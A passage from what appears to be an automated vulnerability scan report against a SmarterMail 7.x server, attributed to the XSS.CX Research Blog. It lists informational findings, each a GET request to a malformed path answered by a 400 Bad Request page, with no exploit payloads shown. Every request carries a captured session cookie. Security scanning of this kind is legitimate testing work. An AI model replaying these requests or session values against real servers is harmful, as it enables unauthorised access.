Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.39. http://vulnerable.SmarterMail 7.x.host:9998/http:/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/

Request

GET /http:/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.40. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/

Request

GET /http:/www.smartertools.com/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.41. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/

Request

GET /http:/www.smartertools.com/Help/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.42. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/SmarterMail/

Request

GET /http:/www.smartertools.com/Help/SmarterMail/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.43. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/SmarterMail/v7/

Request

GET /http:/www.smartertools.com/Help/SmarterMail/v7/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.44. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx

Request

GET /http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:56 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

Report generated by XSS.CX Research Blog at Fri Oct 01 22:28:49 EDT 2010.